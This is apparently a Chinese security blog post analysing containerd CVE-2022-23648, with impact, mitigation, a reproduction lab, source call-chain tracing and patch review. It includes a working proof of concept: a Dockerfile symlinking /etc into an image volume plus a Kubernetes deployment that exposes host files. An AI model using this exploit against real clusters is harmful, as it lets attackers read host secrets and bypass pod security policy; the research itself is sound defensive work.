tags: cve,漏洞分析

containerd CVE-2022-23648 分析与复现

note: 本文写作时,为2022年3月7日。写作时未发现任何漏洞详细信息。

一、基本信息

Item Details Note
Project https://github.com/containerd/containerd
Publish Date 2022-03-03
Confirm Link GHSA-crp2-qrr5-8pq7
CVE-ID CVE-2022-23648 GHSA, NVD, mitre, cvedetails
EDB-ID
Exploits ssst0n3/cve-2022-23648:etc
Affect Version <= 1.4.12, 1.5.0 - 1.5.9, 1.6.0
Fix Version 1.6.1, 1.5.10 and 1.4.13
Fix Commit containerd/containerd@075cfdf
CVSS CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Vuln’s Author Felix Wilhelm@Google Project Zero github
Author’s Report /project-zero/issues@2244

二、组件简介

containerd被众多容器软件使用,包括k8s, docker, kata, linuxkit等,是行业的事实标准。containerd可以管理容器的完整生命周期,包括镜像传输和存储、容器执行和管理、存储和网络等。

更多信息参见containerd官网github项目主页

三、漏洞作者

Felix Wilhelm 是 Google Project Zero 的 云安全研究员, 在容器领域挖掘过多个漏洞,同时也是cgroup release_agent逃逸手法的提出者。

Item Link
Author Felix Wilhelm
Organization Google Project Zero
ERNW
github https://github.com/felixwilhelm
email fwilhelm@google.com
twitter @_fel1x
hackerone https://hackerone.com/fwilhelm?type=user
crunchbase https://www.crunchbase.com/person/felix-wilhelm
linkedin (not visible) https://www.linkedin.cn/injobs/in/felix-wilhelm-298984133
rocketreach https://rocketreach.co/felix-wilhelm-email_46960220
cve owner:fwilhelm@google.com under project zero
author Felix Wilhelm under packetstorm
containerd CVE-2022-23648
runc CVE-2021-43784
Kubernetes: Multiple issues in aws-iam-authenticator
Terminal escape injection in AWS CloudShell
Sublime Package Control: Arbitrary File Write on packagecontrol.io
git CVE-2020-5260,CVE-2020-11008
KVM CVE-2021-29657,CVE-2021-4093,CVE-2019-7222,CVE-2019-7221,CVE-2018-12904
F5 Big IP CVE-2021-22992,CVE-2021-22991
Apache HTTP Server CVE-2020-9490,CVE-2020-11984,CVE-2020-11993
Node.js CVE-2020-8265,CVE-2020-8172
usrsctp Insecure HMAC generation leads to OOB access, pending_reply_queue OOB access
GitHub CVE-2020-15228
HashiCorp Vault CVE-2020-16251,CVE-2020-16251
haproxy CVE-2020-11100
NetworkManager/DHCP CVE-2018-1111
GNOME/evince CVE-2017-1000083
Xen CVE-2018-15471
EMC CVE-2016-0913
Ruby CVE-2013-0156
CakePHP CVE-2010-4335
presents HITB-2018: DHCP Is Hard
blackhat/us-16: XENPWN: BREAKING PARAVIRTUALIZED DEVICES
44con/london-2015: Playing with Fire: Attacking the FireEye MPS, pdf
blog An EPYC escape: Case-study of a KVM breakout
Enter the Vault: Authentication Issues in HashiCorp Vault
FELIX WILHELM’s blogs at ENRW
other publicly presented the first container escape using release_agent

四、漏洞详情

1. 介绍

通过containerd的CRI实现部署一个恶意镜像容器时,可以获得主机上任意文件和目录的只读副本。这可能会绕过任何基于策略的容器安全机制(包括Kubernetes Pod安全策略),并暴露出潜在的敏感信息。Kubernetes和crictl都可以被配置为使用containerd的CRI实现。

2. 影响

2.1 范围

<= 1.4.12, 1.5.0 - 1.5.9, 1.6.0

2.2 危害

可以读取宿主机任意文件,而宿主机上可能包括允许容器逃逸的敏感信息。

2.3 利用场景

影响k8s/crictl+containerd,而k8s+docker或docker+containerd场景不受影响

五、防御

1. 修复建议

升级containerd至最新版本。

2. 规避措施

如果不方便升级containerd版本,则应限制用户运行自定义镜像。

3. 检测

因为复制宿主机文件的操作由containerd执行,因此只能从行为层面检测。

可以通过检测containerd复制宿主机操作系统关键文件的行为,判定该漏洞是否被利用。

六、漏洞复现

1. 复现环境

1.1 docker-archive 镜像

我已经将存在漏洞的环境打包成了docker-archive镜像,可以直接使用。

docker run --privileged -d -p 2222:22 -ti ssst0n3/docker_archive:ubuntu-20.04_kubernetes-1.23.4_containerd.io-1.4.12-1_calico-3.22.1 /start_vm.sh -enable-kvm
ssh -p 2222 root@127.0.0.1
root@127.0.0.1's password: root
root@ubuntu:~# /wait-for.sh

如果你的环境不支持kvm,可以直接运行镜像,但可能会有点慢。

docker run -d -p 2222:22 -ti ssst0n3/docker_archive:ubuntu-20.04_kubernetes-1.23.4_containerd.io-1.4.12-1_calico-3.22.1
ssh -p 2222 root@127.0.0.1
root@127.0.0.1's password: root
root@ubuntu:~# /wait-for.sh

如果你希望自行搭建环境,可以参照下文 1.2 手动安装 的步骤执行。

1.2 手动安装

找一台linux主机(这里以ubuntu20.04为例), 参考k8s官方安装文档安装k8s+containerd。

1.2.1 安装containerd

https://kubernetes.io/zh/docs/setup/production-environment/container-runtimes/#containerd

安装和配置的先决条件:

cat <<EOF | sudo tee /etc/modules-load.d/containerd.conf
overlay
br_netfilter
EOF

sudo modprobe overlay
sudo modprobe br_netfilter

# 设置必需的 sysctl 参数,这些参数在重新启动后仍然存在。
cat <<EOF | sudo tee /etc/sysctl.d/99-kubernetes-cri.conf
net.bridge.bridge-nf-call-iptables  = 1
net.ipv4.ip_forward                 = 1
net.bridge.bridge-nf-call-ip6tables = 1
EOF

# 应用 sysctl 参数而无需重新启动
sudo sysctl --system

参考docker官方安装文档 安装 containerd.io

apt-get update
apt-get install ca-certificates curl gnupg lsb-release
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update

查询 containerd.io 版本, 选择存在漏洞的版本

# apt-cache madison containerd.io
containerd.io |   1.4.13-1 | https://download.docker.com/linux/ubuntu focal/stable amd64 Packages
containerd.io |   1.4.12-1 | https://download.docker.com/linux/ubuntu focal/stable amd64 Packages
...

因为1.4.13是修复版本,所以我们选择1.4.12-1

apt-get install -y containerd.io=1.4.12-1

配置containerd

sudo mkdir -p /etc/containerd
containerd config default | sudo tee /etc/containerd/config.toml
sed -i '/\[plugins\."io\.containerd\.grpc\.v1\.cri"\.containerd\.runtimes\.runc\.options\]/a SystemdCgroup = true' /etc/containerd/config.toml
sudo systemctl restart containerd
1.2.2 安装kubernetes
sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl
sudo curl -fsSLo /usr/share/keyrings/kubernetes-archive-keyring.gpg https://packages.cloud.google.com/apt/doc/apt-key.gpg
echo "deb [signed-by=/usr/share/keyrings/kubernetes-archive-keyring.gpg] https://apt.kubernetes.io/ kubernetes-xenial main" | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo apt-get update
sudo apt-get install -y kubelet kubeadm kubectl
1.2.3 初始化集群并安装cni

https://docs.projectcalico.org/getting-started/kubernetes/quickstart

kubeadm init --pod-network-cidr=192.168.0.0/16
mkdir -p $HOME/.kube
cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
chown $(id -u):$(id -g) $HOME/.kube/config
kubectl create -f https://docs.projectcalico.org/manifests/tigera-operator.yaml
kubectl create -f https://docs.projectcalico.org/manifests/custom-resources.yaml

等待calico-system容器启动

watch kubectl get pods -n calico-system

启动完成后calico-system容器应该都为running状态

# kubectl get pods -n calico-system
NAME                                       READY   STATUS    RESTARTS   AGE
calico-kube-controllers-67f85d7449-jv9b2   1/1     Running   0          3m40s
calico-node-jfd9t                          1/1     Running   0          3m40s
calico-typha-5ff69d8599-pqj9j              1/1     Running   0          3m40s

允许在master节点部署容器

kubectl taint nodes --all node-role.kubernetes.io/master-
1.2.4 环境验证
# containerd --version
containerd containerd.io 1.4.12 7b11cfaabd73bb80907dd23182b9347b4245eb5d
# kubectl get pods -A
NAMESPACE          NAME                                       READY   STATUS    RESTARTS   AGE
calico-apiserver   calico-apiserver-68b5698d78-6qlg2          1/1     Running   0          3m18s
calico-apiserver   calico-apiserver-68b5698d78-wggpj          1/1     Running   0          3m18s
calico-system      calico-kube-controllers-67f85d7449-jv9b2   1/1     Running   0          5m49s
calico-system      calico-node-jfd9t                          1/1     Running   0          5m49s
calico-system      calico-typha-5ff69d8599-pqj9j              1/1     Running   0          5m49s
kube-system        coredns-64897985d-fkn8c                    1/1     Running   0          6m56s
kube-system        coredns-64897985d-vq8tb                    1/1     Running   0          6m56s
kube-system        etcd-cve2022-23684                         1/1     Running   0          7m3s
kube-system        kube-apiserver-cve2022-23684               1/1     Running   0          7m3s
kube-system        kube-controller-manager-cve2022-23684      1/1     Running   0          7m3s
kube-system        kube-proxy-4bctr                           1/1     Running   0          6m56s
kube-system        kube-scheduler-cve2022-23684               1/1     Running   0          7m3s
tigera-operator    tigera-operator-b876f5799-vlxq7            1/1     Running   0          6m56s

2. 复现

2.1 准备恶意镜像

自行编译,或使用我已准备好的镜像 ssst0n3/cve-2022-23648:etc

Dockerfile

FROM busybox
RUN ln -s /etc /volume
VOLUME /volume

/etc为攻击者需要读取的目录,可以改为其他目录

docker build -t ssst0n3/cve-2022-23648:etc .
docker push ssst0n3/cve-2022-23648:etc

2.2 k8s deployment

poc.yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: demo-deployment
spec:
  selector:
    matchLabels:
      app: demo
  replicas: 1
  template:
    metadata:
      labels:
        app: demo
    spec:
      containers:
      - name: demo
        image: ssst0n3/cve-2022-23648:etc
        tty: true
        imagePullPolicy: Always

2.3 验证

创建/etc/st0n3文件。

touch /etc/st0n3

部署恶意容器。

kubectl apply -f poc.yaml

等待容器启动后,进入容器验证/etc/st0n3文件是否存在,存在则攻击成功。

pod=$(kubectl get pod -l "app=demo" -o jsonpath='{.items[0].metadata.name}')
kubectl wait --for=jsonpath='{.status.phase}'=Running pod/$pod --timeout=60s

kubectl exec -ti $pod -- ls -lah /etc/st0n3
-rw-r--r--    1 root     root           0 Mar 11 15:09 /etc/st0n3

七、漏洞分析

1. 漏洞点分析

根据漏洞修复commit, 得知漏洞点位于containerd/containerd/pkg/cri/opts包下的WithVolumes函数。

为了同步卷和容器文件系统中的文件,在创建容器前,调用copyExistingContents(src, host)将卷中的文件复制到容器rootfs中。但这里的src变量是卷内的路径,可能会被修改为软链接。

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/opts/container.go#L115

func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
    return func(ctx context.Context, client *containerd.Client, c *containers.Container) (err error) {
        ...
        for host, volume := range volumeMounts {
            // The volume may have been defined with a C: prefix, which we can't use here.
            volume = strings.TrimPrefix(volume, "C:")
            for _, mountPath := range mountPaths {
                src := filepath.Join(mountPath, volume)
                if _, err := os.Stat(src); err != nil {
                    if os.IsNotExist(err) {
                        // Skip copying directory if it does not exist.
                        continue
                    }
                    return fmt.Errorf("stat volume in rootfs: %w", err)
                }
                if err := copyExistingContents(src, host); err != nil {
                    return fmt.Errorf("taking runtime copy of volume: %w", err)
                }
            }
        }
        return nil
    }
}

2. 调用链分析

经分析,该漏洞点的完整调用链为:

  1. 客户端调用containerd提供的GRPC服务,api地址为/runtime.v1.RuntimeService/CreateContainer/runtime.v1alpha2.RuntimeService/CreateContainer
  2. 上述api地址会触发criService.CreateContainer方法
  3. criService.CreateContainer方法中调用WithVolumes函数

分析过程如下:

根据漏洞修复commit, 得知需要调用containerd/containerd/pkg/cri/opts包下的WithVolumes函数,因此需要递归向上找到调用链。

该函数仅被criService.CreateContainer方法调用,作为创建容器的选项将来传递给c.client.NewContainer创建容器。

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/container_create.go#L202

func (c *criService) CreateContainer(ctx context.Context, r *runtime.CreateContainerRequest) (_ *runtime.CreateContainerResponse, retErr error) {
    ...
    var volumeMounts []*runtime.Mount
    if !c.config.IgnoreImageDefinedVolumes {
        // Create container image volumes mounts.
        volumeMounts = c.volumeMounts(containerRootDir, config.GetMounts(), &image.ImageSpec.Config)
    }
    ...
    if len(volumeMounts) > 0 {
        mountMap := make(map[string]string)
        for _, v := range volumeMounts {
            mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
        }
        opts = append(opts, customopts.WithVolumes(mountMap))
    }
    ...
    if cntr, err = c.client.NewContainer(ctx, id, opts...); err != nil {
        return nil, fmt.Errorf("failed to create containerd container: %w", err)
    }
    ...
}

criService是一个GRPC服务,在程序init时被加载为插件。

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/cri.go#L48

func init() {
    ...
    plugin.Register(&plugin.Registration{
        Type:   plugin.GRPCPlugin,
        ID:     "cri",
        ...
        InitFn: initCRIService,
    })
}

func initCRIService(ic *plugin.InitContext) (interface{}, error) {
    ...
    s, err := server.NewCRIService(c, client)
    ...
    return s, nil
}

凡是被注册为插件的GRPC服务,在containerd启动时,都会执行其注册函数,注册为containerd的一个服务。

https://github.com/containerd/containerd/blob/v1.6.0/services/server/server.go#L285

func New(ctx context.Context, config *srvconfig.Config) (*Server, error) {
    ...
    for _, service := range grpcServices {
        if err := service.Register(grpcServer); err != nil {
            return nil, err
        }
    }
    ...
}

criService被instrumentedServiceinstrumentedAlphaService两个服务封装了。criService被注册时实际调用了protobuf的注册函数,把这两个服务注册成为了GRPC服务。两个服务的调用流程是类似的,下面我们以instrumentedService为例继续跟踪。

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/service.go#L183

func (c *criService) Register(s *grpc.Server) error {
    return c.register(s)
}

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/service.go#L311

func (c *criService) register(s *grpc.Server) error {
    instrumented := newInstrumentedService(c)
    runtime.RegisterRuntimeServiceServer(s, instrumented)
    runtime.RegisterImageServiceServer(s, instrumented)
    instrumentedAlpha := newInstrumentedAlphaService(c)
    runtime_alpha.RegisterRuntimeServiceServer(s, instrumentedAlpha)
    runtime_alpha.RegisterImageServiceServer(s, instrumentedAlpha)
    return nil
}

https://github.com/containerd/containerd/blob/v1.6.0/vendor/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L8889

func RegisterRuntimeServiceServer(s *grpc.Server, srv RuntimeServiceServer) {
    s.RegisterService(&_RuntimeService_serviceDesc, srv)
}

这样,将来,GRPC服务在被调用时,就会根据_RuntimeService_serviceDesc中声明的api调用对应的服务和函数。例如,当我们想要调用/runtime.v1.RuntimeService/CreateContainer api时,会调用_RuntimeService_CreateContainer_Handler函数,且此时传递给该函数的服务srvinstrumentedService

https://github.com/containerd/containerd/blob/v1.6.0/vendor/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L9355

var _RuntimeService_serviceDesc = grpc.ServiceDesc{
    ServiceName: "runtime.v1.RuntimeService",
    HandlerType: (*RuntimeServiceServer)(nil),
    Methods: []grpc.MethodDesc{
        ...
        {
            MethodName: "CreateContainer",
            Handler:    _RuntimeService_CreateContainer_Handler,
        },
        ...
    },
    ...
}

https://github.com/containerd/containerd/blob/v1.6.0/vendor/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L9001

func _RuntimeService_CreateContainer_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
    in := new(CreateContainerRequest)
    if err := dec(in); err != nil {
        return nil, err
    }
    if interceptor == nil {
        return srv.(RuntimeServiceServer).CreateContainer(ctx, in)
    }
    info := &grpc.UnaryServerInfo{
        Server:     srv,
        FullMethod: "/runtime.v1.RuntimeService/CreateContainer",
    }
    handler := func(ctx context.Context, req interface{}) (interface{}, error) {
        return srv.(RuntimeServiceServer).CreateContainer(ctx, req.(*CreateContainerRequest))
    }
    return interceptor(ctx, in, info, handler)
}

_RuntimeService_CreateContainer_Handler函数中调用srv.(RuntimeServiceServer).CreateContainer方法时,实际将调用instrumentedService.CreateContainer方法。

而该方法只是对criService.CreateContainer方法的封装,在调用前打印了日志。

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/instrumented_service.go#L404

func (in *instrumentedService) CreateContainer(ctx context.Context, r *runtime.CreateContainerRequest) (res *runtime.CreateContainerResponse, err error) {
    if err := in.checkInitialized(); err != nil {
        return nil, err
    }
    log.G(ctx).Infof("CreateContainer within sandbox %q for container %+v",
        r.GetPodSandboxId(), r.GetConfig().GetMetadata())
    defer func() {
        if err != nil {
            log.G(ctx).WithError(err).Errorf("CreateContainer within sandbox %q for %+v failed",
                r.GetPodSandboxId(), r.GetConfig().GetMetadata())
        } else {
            log.G(ctx).Infof("CreateContainer within sandbox %q for %+v returns container id %q",
                r.GetPodSandboxId(), r.GetConfig().GetMetadata(), res.GetContainerId())
        }
    }()
    res, err = in.c.CreateContainer(ctrdutil.WithNamespace(ctx), r)
    return res, errdefs.ToGRPC(err)
}

https://github.com/containerd/containerd/blob/v1.6.0/pkg/cri/server/service.go#L311

func (c *criService) register(s *grpc.Server) error {
    instrumented := newInstrumentedService(c)
    ...
}

至此我们确认了criService.CreateContainer方法会作为GRPC服务被调用,调用的api为

  • /runtime.v1.RuntimeService/CreateContainer
  • /runtime.v1alpha2.RuntimeService/CreateContainer

3. 利用场景分析

根据上文分析,达到漏洞点必须要调用cri的api,因此我们需要判断哪些主流使用场景会调用该api,包括以下场景需要分析:

  1. k8s+containerd
  2. k8s+docker+containerd
  3. docker+containerd
  4. ctr+containerd

3.1 k8s+containerd

k8s+containerd场景存在漏洞。

根据上文调用链分析,如果存在漏洞,要求k8s调用containerd的api /runtime.v1.RuntimeService/CreateContainer/runtime.v1alpha2.RuntimeService/CreateContainer。经正向分析验证,k8s在创建容器时会调用该api,分析过程如下:

在初始化Kubelet时,给定了syncPod方法,这个方法会将容器同步至期望状态。

因为k8s基于reconciler模式的设计,分析出该方法的调用链会过于冗长,限于篇幅限制,该方法的调用链,本文不会详细分析。分析k8s对容器runtime的调用,我们可以直接从这个函数开始分析。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kubelet.go#L649

func NewMainKubelet(...) (*Kubelet, error) {
    ...
    klet.podWorkers = newPodWorkers(
        klet.syncPod,
        ...
    )
    runtime, err := kuberuntime.NewKubeGenericRuntimeManager(...)
    ...
    klet.containerRuntime = runtime
    ...
}

Kubelet.syncPod方法中,会调用containerRuntime.SyncPod方法,而containerRuntime就是在初始化kubelet时给定的kubeGenericRuntimeManager对象。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kubelet.go#L1540

func (kl *Kubelet) syncPod(ctx context.Context, updateType kubetypes.SyncPodType, pod, mirrorPod *v1.Pod, podStatus *kubecontainer.PodStatus) error {
    ...
    result := kl.containerRuntime.SyncPod(pod, podStatus, pullSecrets, kl.backOff)
    ...
}

如果需要创建容器,会调用kubeGenericRuntimeManager.createPodSandbox方法。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kuberuntime/kuberuntime_manager.go#L817

func (m *kubeGenericRuntimeManager) SyncPod(pod *v1.Pod, podStatus *kubecontainer.PodStatus, pullSecrets []v1.Secret, backOff *flowcontrol.Backoff) (result kubecontainer.PodSyncResult) {
    ...
    podSandboxID, msg, err = m.createPodSandbox(pod, podContainerChanges.Attempt)
    ...
}

该方法中创建了pod配置,然后调用runtimeService.RunPodSandbox方法。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kuberuntime/kuberuntime_sandbox.go#L67

func (m *kubeGenericRuntimeManager) createPodSandbox(pod *v1.Pod, attempt uint32) (string, string, error) {
    podSandboxConfig, err := m.generatePodSandboxConfig(pod, attempt)
    ...
    runtimeHandler := ""
    if m.runtimeClassManager != nil {
        runtimeHandler, err = m.runtimeClassManager.LookupRuntimeHandler(pod.Spec.RuntimeClassName)
        ...
    }
    
    podSandBoxID, err := m.runtimeService.RunPodSandbox(podSandboxConfig, runtimeHandler)
    ...
}

runtimeService是一个gRPC的客户端,RunPodSandbox方法中会调用gRPC服务。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/kuberuntime/instrumented_services.go#L185

func (in instrumentedRuntimeService) RunPodSandbox(config *runtimeapi.PodSandboxConfig, runtimeHandler string) (string, error) {
    ...
    out, err := in.service.RunPodSandbox(config, runtimeHandler)
    ...
}

这里有两个版本的api,分别是v1, v1alpha2, 根据runtime支持的版本来调用对应的方法。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/cri/remote/remote_runtime.go#L180

func (r *remoteRuntimeService) RunPodSandbox(config *runtimeapi.PodSandboxConfig, runtimeHandler string) (string, error) {
    ...
    if r.useV1API() {
        resp, err := r.runtimeClient.RunPodSandbox(ctx, &runtimeapi.RunPodSandboxRequest{
            Config:         config,
            RuntimeHandler: runtimeHandler,
        })
        ...
    } else {
        resp, err := r.runtimeClientV1alpha2.RunPodSandbox(ctx, &runtimeapiV1alpha2.RunPodSandboxRequest{
            Config:         v1alpha2PodSandboxConfig(config),
            RuntimeHandler: runtimeHandler,
        })
        ...
    }
    ...
}

即调用runtime的api /runtime.v1.RuntimeService/RunPodSandbox/runtime.v1alpha2.RuntimeService/RunPodSandbox。至此确定k8s会调用containerd的api,分析完毕。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1/api.pb.go#L8529

func (c *runtimeServiceClient) RunPodSandbox(ctx context.Context, in *RunPodSandboxRequest, opts ...grpc.CallOption) (*RunPodSandboxResponse, error) {
    ...
    err := c.cc.Invoke(ctx, "/runtime.v1.RuntimeService/RunPodSandbox", in, out, opts...)
    ...
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1alpha2/api.pb.go#L8539

func (c *runtimeServiceClient) RunPodSandbox(ctx context.Context, in *RunPodSandboxRequest, opts ...grpc.CallOption) (*RunPodSandboxResponse, error) {
    ...
    err := c.cc.Invoke(ctx, "/runtime.v1alpha2.RuntimeService/RunPodSandbox", in, out, opts...)
    ...
}

3.2 k8s+docker+containerd

低版本k8s(即使用了dockershim的版本,本文编写时k8s尚未完成dockershim移除工作)不涉及此漏洞,分析过程如下:

根据上文分析,k8s创建容器会调用runtime的api /runtime.v1.RuntimeService/RunPodSandbox/runtime.v1alpha2.RuntimeService/RunPodSandbox

如果runtime为dockershim,应该也注册了api。经分析,dockershim确实注册v1aplha2 api。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/dockershim/remote/docker_server.go#L73

func (s *DockerServer) Start() error {
    ...
    runtimeapi.RegisterRuntimeServiceServer(s.server, s.service)
    ...
    return nil
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1alpha2/api.pb.go#L8899

func RegisterRuntimeServiceServer(s *grpc.Server, srv RuntimeServiceServer) {
    s.RegisterService(&_RuntimeService_serviceDesc, srv)
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/staging/src/k8s.io/cri-api/pkg/apis/runtime/v1alpha2/api.pb.go#L9345

var _RuntimeService_serviceDesc = grpc.ServiceDesc{
    ServiceName: "runtime.v1alpha2.RuntimeService",
    ...
    Methods: []grpc.MethodDesc{
        ...
        {
            MethodName: "RunPodSandbox",
            Handler:    _RuntimeService_RunPodSandbox_Handler,
        },
    },
	...
}

因此, k8s+docker未调用containerd的api。至于dockershim提供的api是否有类似问题,则需要分析dockershim对该api的实现。分析调用链发现,dockershim实际调用了dockerd的api,这个调用与下文docker+containerd场景一致,详细内容可以参见下文关于"docker+containerd"场景的分析。

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/dockershim/docker_sandbox.go#L115

func (ds *dockerService) RunPodSandbox(ctx context.Context, r *runtimeapi.RunPodSandboxRequest) (*runtimeapi.RunPodSandboxResponse, error) {
    ...
    createResp, err := ds.client.CreateContainer(*createConfig)
    ...
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/pkg/kubelet/dockershim/libdocker/kube_docker_client.go#L149

func (d *kubeDockerClient) CreateContainer(opts dockertypes.ContainerCreateConfig) (*dockercontainer.ContainerCreateCreatedBody, error) {
	...
	createResp, err := d.client.ContainerCreate(ctx, opts.Config, opts.HostConfig, opts.NetworkingConfig, nil, opts.Name)
	...
}

https://github.com/kubernetes/kubernetes/blob/v1.23.4/vendor/github.com/docker/docker/client/container_create.go#L24

func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, platform *specs.Platform, containerName string) (container.ContainerCreateCreatedBody, error) {
    ...
}

3.3 docker+containerd

docker container create 或 docker run 会触发容器创建流程,根据分析,该流程不会调用到containerd。

详细流程参见 《docker container create 流程 源码分析》

docker在创建容器时,也会从容器文件系统中复制文件到卷,但docker在复制时,容器文件系统的路径即源路径,解析了软链接,并限制在容器rootfs内。因此不存在与此漏洞相同机制的漏洞。

https://github.com/moby/moby/blob/master/container/container_unix.go#L129

func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error {
    rootfs, err := container.GetResourcePath(destination)
    if err != nil {
        return err
    }
    ...
    id := stringid.GenerateRandomID()
    path, err := v.Mount(id)
    if err != nil {
        return err
    }

    defer func() {
        if err := v.Unmount(id); err != nil {
            logrus.Warnf("error while unmounting volume %s: %v", v.Name(), err)
        }
    }()
    ...
    return copyExistingContents(rootfs, path)
}

3.4 ctr+contaienrd

ctr是containerd的cli,可以使用ctr container create <ImageName> <ContainerID>等命令创建容器。根据分析,该方式创建的容器不会调用criService。

分析过程如下,关于更详细的ctr创建容器流程参见《ctr container create 流程》

cmd/ctr/commands/containers目录找到createCommand, 一直跟踪下去,都是在处理参数和调用新的Create函数。

https://github.com/containerd/containerd/blob/v1.6.0/cmd/ctr/commands/containers/containers.go#L85

var createCommand = cli.Command{
    ...
    Action: func(context *cli.Context) error {
        ...
        _, err = run.NewContainer(ctx, client, context)
        ...
    },
}

https://github.com/containerd/containerd/blob/v1.6.0/cmd/ctr/commands/run/run_unix.go#L347

func NewContainer(ctx gocontext.Context, client *containerd.Client, context *cli.Context) (containerd.Container, error) {
    ...
    return client.NewContainer(ctx, id, cOpts...)
}

https://github.com/containerd/containerd/blob/v1.6.0/client.go#L289

func (c *Client) NewContainer(ctx context.Context, id string, opts ...NewContainerOpts) (Container, error) {
    ...
    r, err := c.ContainerService().Create(ctx, container)
    ...
}

https://github.com/containerd/containerd/blob/v1.6.0/containerstore.go#L110

func (r *remoteContainers) Create(ctx context.Context, container containers.Container) (containers.Container, error) {
    created, err := r.client.Create(ctx, &containersapi.CreateContainerRequest{
        Container: containerToProto(&container),
    })
    ...
}

直到调用GRPC,由服务端执行containerd.services.containers.v1.Containers服务的Create方法。

https://github.com/containerd/containerd/blob/v1.6.0/api/services/containers/v1/containers.pb.go#L729

func (c *containersClient) Create(ctx context.Context, in *CreateContainerRequest, opts ...grpc.CallOption) (*CreateContainerResponse, error) {
    out := new(CreateContainerResponse)
    err := c.cc.Invoke(ctx, "/containerd.services.containers.v1.Containers/Create", in, out, opts...)
    if err != nil {
        return nil, err
    }
    return out, nil
}

八、修复分析

1. commit分析

根据github安全通告GHSA-crp2-qrr5-8pq7,修复版本为1.6.1, 1.5.10和1.4.13,因此可以比较修复版本和前一个版本的变化。

https://github.com/containerd/containerd/compare/v1.6.0...v1.6.1

仅有7个commit差异,可以快速分析出修复commit为

https://github.com/containerd/containerd/commit/075cfdff68941fe30338ebe034fa67ce09fb4b55

    for _, mountPath := range mountPaths {
-       src := filepath.Join(mountPath, volume)
+       src, err := fs.RootPath(mountPath, volume)
+       if err != nil {
+           return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
+       }
        if _, err := os.Stat(src); err != nil {
            if os.IsNotExist(err) {
                // Skip copying directory if it does not exist.

仅修复了一个点,将路径拼接的函数由filepath.Join替换成了fs.RootPath


filepath.Join是go提供的路径拼接函数,仅对路径进行拼接,不做任何校验。

fs.RootPath()函数提供了以下功能的校验:

  1. 递归遍历软链接,直到路径不再是软链接,才进行拼接。
  2. 拼接时避免了目录穿越

https://github.com/containerd/containerd/blob/v1.6.1/vendor/github.com/containerd/continuity/fs/path.go#L227

// RootPath joins a path with a root, evaluating and bounding any
// symlink to the root directory.
func RootPath(root, path string) (string, error) {
    if path == "" {
        return root, nil
    }
    var linksWalked int // to protect against cycles
    for {
        i := linksWalked
        newpath, err := walkLinks(root, path, &linksWalked)
        if err != nil {
            return "", err
        }
        path = newpath
        if i == linksWalked {
            newpath = filepath.Join("/", newpath)
            if path == newpath {
                return filepath.Join(root, newpath), nil
            }
            path = newpath
        }
    }
}

walkLinks函数分析略

https://github.com/containerd/containerd/blob/v1.6.1/vendor/github.com/containerd/continuity/fs/path.go#L279

因此,修复后,volume路径即使是软链接,也被限制在mountPath下了,即fs.RootPath()函数名中Root的含义。

时间线

漏洞产生、发现、报告、修复、分析的时间线

  • 2021-11-22 作者Felix Wilhelm向containerd报告
  • 2022-02-18 containerd要求宽限至3月7日公开
  • 2022-03-03 containerd完成修复,并在GHSA发布漏洞通告
  • 2022-03-04 我人工查阅GHSA捕获到漏洞情报
  • 2022-03-07 我完成漏洞复现
  • 2022-03-24 Google Project Zero 因达到90+30天期限公开漏洞报告
  • 2022-03-26 我完成主要内容分析,主要时间花在调用链分析上
  • 2022-03-29 博客公开本文
  • 2022-04-27 公众号发布本文